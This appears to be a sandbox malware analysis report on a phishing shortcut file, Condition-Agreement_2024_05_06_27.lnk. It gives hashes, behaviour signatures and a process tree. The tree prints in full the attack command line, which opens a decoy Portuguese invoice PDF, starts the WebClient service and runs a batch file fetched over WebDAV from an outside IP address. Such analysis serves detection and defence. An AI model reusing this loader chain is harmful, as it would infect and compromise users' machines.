Overview

overview

7

Static

static

1

Condition-...27.lnk

windows7-x64

4

Condition-...27.lnk

windows10-2004-x64

7

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    08/05/2024, 07:42

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Condition-Agreement_2024_05_06_27.lnk

  • Size

    2KB

  • MD5

    a497662f623efb41bcf7c05b6571edfe

  • SHA1

    c1b3a6927f8032d0052ff9a118c16e55a9f97dea

  • SHA256

    132f8d12421381a77b9d164a90c155b05c9f57fd3a2e79a5a2a50c183b8bb4e5

  • SHA512

    d955dda82d9349aeceb27d29ed09816d9773cff050abdbcd928d66b1532c1adc4c0f454a8c027b67fa13e8157674a1edacff884ccd35f4b4652cf5241d12a1a3

Score
4/10

Malware Config

Signatures

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Condition-Agreement_2024_05_06_27.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\vHRfeSre\Offer202412.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:2476
      • C:\Windows\system32\sc.exe
        sc start webclient
        3⤵
        • Launches sc.exe
        PID:2044
      • C:\Windows\system32\PING.EXE
        ping localhost -n 7
        3⤵
        • Runs ping.exe
        PID:2440
      • C:\Windows\system32\cmd.exe
        cmd.exe /c \\38.180.136.158@80\vHRfeSre\Offer202412.bat
        3⤵
          PID:1460

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
            Filesize

            3KB

            MD5

            51468201884927ab944df694045be2ca

            SHA1

            5d24a941358bdda5150c4cef8f624c240615e366

            SHA256

            a8a3800c94efc05ca45b3d919d2c1930427bc41e23ab4a99864895ca57c54c19

            SHA512

            ea93371ac98ac8dc9ad57586b759f78738ac535cfc2b4ebde9f448bfd3dd92aaaa36d55aa327cb21ce6b0af22715c655b64a692e4be0b19da53bb05e502c9b06

            Download Submit

          • C:\Users\Admin\Downloads\NotaFiscal.pdf
            Filesize

            29B

            MD5

            823a9caa296579d6a40cd5195d969727

            SHA1

            5592813787ecff9133229439498d624339c07ece

            SHA256

            60b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e

            SHA512

            77ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc

            Download Submit